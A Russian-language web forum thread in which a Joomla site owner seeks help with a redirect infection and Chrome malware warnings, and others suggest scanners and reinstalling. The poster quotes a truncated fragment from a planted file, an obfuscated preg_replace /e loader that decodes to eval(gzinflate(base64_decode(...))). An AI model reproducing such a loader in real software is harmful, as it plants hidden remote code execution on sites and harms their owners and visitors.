Гугл ругает на вредоносное ПО.

Суть вот в чем. Есть сайт на джумле 1.5.22: http://www.archerycenter.ru/
На нем после установки модуля меню был замечен редирект при переходе из поиковика(яндекса) на левый сайт. Меню и все что связанно с редиректом было удалено или заменено при помощи php replace(спасибо форуму за это). Все доступы по фтп удалены и есть только доступ по ssh, к которому поменян пароль.

Теперь ХРОМ пишет, что сайт заражен вредоносным ПО, причем если только заходить через хром. Мазилле на это глубоко начхать. Скидывание сайта на комп и его проверка не дала никаких результатов. Причем если почистить кеш в хроме то он перестает вредничать, но на время.

Самое интересное, что такое происходит пока что только на моем компе. Не у заказчиков не у друзей хром не ругается.
Твориться какая то чертовщина. Прошу помощи или придется комп на крещение в прорубь окунать что бы избавить его от бесов.
PS Проверка онлайн вирусами тоже не дала результатов.

 

Не нашла такой ветки.

 

Спасибо большое за ссылку. Проверила, но не увидела каких то"квакозябр" , кроме как/images/stories/.cache_bhcvym.php

Код (PHP):

1. ... preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'5b19fxq30jD8d/wp5C2nCw3GgJOc1DbEiWMnThM79 ...

В кодах я разбираюсь не очень, но в основном как показалось iframe все от плагинов установленных уже давно.
http://www.archerycenter.ru/jamss.php

 

Спасибо. Они почему то все равно появляются и появляются. Как такое возможно и как убрать что бы забыть об этом. Уж очень не хочется сносить и заново ставить сайт.

 

Ведь может ли содержаться в кодах сайта не вирусное base64_decode?

 

Я пыталась этим сканером сделать, НО у меня больше 30 сек. не поставить выполнение скрипта на сервере(такой аккаунт)
Поэтому этим скриптом увы никак.

 

Все попытки зачистки привели ни к чему.
Осталось два варианта:
-нанять специалиста
-все переустановить

 

Второй вариант надежнее.